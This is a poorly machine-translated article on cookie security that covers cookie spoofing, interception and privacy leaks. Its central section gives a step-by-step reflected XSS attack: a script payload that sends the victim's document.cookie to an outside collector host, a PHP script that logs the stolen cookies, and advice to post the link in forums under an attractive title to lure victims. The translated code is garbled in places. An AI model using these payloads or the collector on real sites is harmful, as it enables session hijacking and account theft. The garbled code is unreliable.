In-depth analysis of Cookie security issues, in-depth analysis of cookies

In-depth analysis of Cookie security issues, in-depth analysis of cookies

The purpose of Cookie is to bring convenience to users and add value to websites. In general, it will not cause serious security threats. A Cookie file cannot be executed as code or transmitted as a virus. It is private to users and can only be read by the server that creates it. In addition, browsers generally only allow 300 cookies, and each site can store up to 20 cookies. The size of each Cookie is limited to 4 kb. Therefore, cookies are not full of hard disks, it will not be used as a "Denial of Service" attack.

However, as an alternative to user identity, the security of cookies sometimes determines the security of the entire system. Therefore, the security of cookies cannot be ignored.

(1) Cookie spoofing cookies record information such as the user's account ID and password. They are usually encrypted using the MD5 method and then transmitted online. The encrypted information cannot be understood even if it is intercepted by someone with ulterior motives on the network. However, the current problem is that the person who intercepts the Cookie does not need to know the meaning of these strings, as long as the Cookie is submitted to the server and can pass verification, you can log on to the website as a victim. This behavior is called Cookie spoofing.
Illegal users obtain encryption keys through Cookie spoofing to access all personalized information of legitimate users, including users' e-mail and even account information, which seriously harms personal information.
(2) Cookie Interception
The Cookie is transmitted between the browser and the server in plain text, which is easily intercepted and used by others. Anyone who can intercept Web communication can read cookies.
After a Cookie is intercepted by an invalid user and then replayed within its validity period, the illegal user will enjoy the legitimate rights and interests of the user. For example, for online reading, illegal users can enjoy online reading of electronic magazines without paying for it.

Cookie interception methodsThere are some of the following:

(1) intercept cookies by programming. The method is analyzed below. This method is completed in two steps.

Step 1: locate the website that needs to collect cookies, analyze them, and construct a URL. First open the website to collect cookies, Here suppose is http://www.XXX.net, login website input user name "<Al>" (not included in quotation marks), the data analysis packet capture, get the following code:
Http://www.XXX.net/tXl/login/login.pl? Username = <Al> & passwd = & OK. X = 28 & OK. y = 6;
Replace "<Al>":
"<Script> alert (document. cookie) </script>" Try again. If the execution is successful, construct the URL:
Http://www.XXX.net/tXl/login/login.pl? Username = <script> window. open ("http://www.cbifamily.org/cbi.php? "% 2bdocument. cookie) </script> & passwd = & OK. X = 28 & OK. y = 6.
Http://www.cbifamily.org/cbi.php is a script on a certain website that the user can control. Note that "% 2b" is the URL encoding of the symbol "+" because "+" will be processed as spaces. This URL can be published in the Forum to entice others to click.

Step 2: compile a PHP script for collecting cookies and place them on a website that can be controlled by the user. If the user does not click the constructed URL, the PHP code can be executed. The script content is as follows:

Copy codeThe Code is as follows:
<? Php
$ Info = getenv ("OUERY_STRING ");
If ($ info ){
$ Fp = fopen ("info. tXt", "");
Fwrite ($ fp ,! Info. "\ n ");
Fclose ($ fp );
}
Header ("Location: http://www.XXX.net ");
?>

Put this code in the network to collect cookies from all users. If a Forum allows HTML code or Flash tags, you can use these technologies to collect Cookie code and put it in the forum. Then, you can give the post an attractive topic and write interesting content, A large number of cookies can be collected soon. On the Forum, many people steal their passwords in this way.
(2) Use the Flash code to intercept cookies. There is a getURL () function in Flash. Flash can use this function to automatically open a specified webpage, which may direct users to a website containing malicious code. For example, when a user appreciates Flash animation on a computer, the code in the animation frame may have been connected to the Internet quietly, and a very small page containing special code is opened, this page can collect cookies and do other harmful things. The website cannot prohibit Flash because it is an internal function of Flash files.
(3) Cookie leakage network privacy
The main cause of network privacy leaks caused by cookies is :! Driven by commercial interests. With the rise of e-commerce and the emergence of huge business opportunities on the Internet, some websites and institutions abuse cookies without the visitor's permission, the use of search engine, data mining, or even network spoofing technology to collect personal data of others for the purpose of building user databases and sending advertisements, resulting in leakage of user privacy. "Openness of Cookie information transmission. Cookie files have special transmission procedures and text features. They are used to transmit unencrypted Cook-ie files between the server and the client, which may easily lead to leaks of personal information.

These are my personal understandings of cookie security. If you have any omissions, please correct them.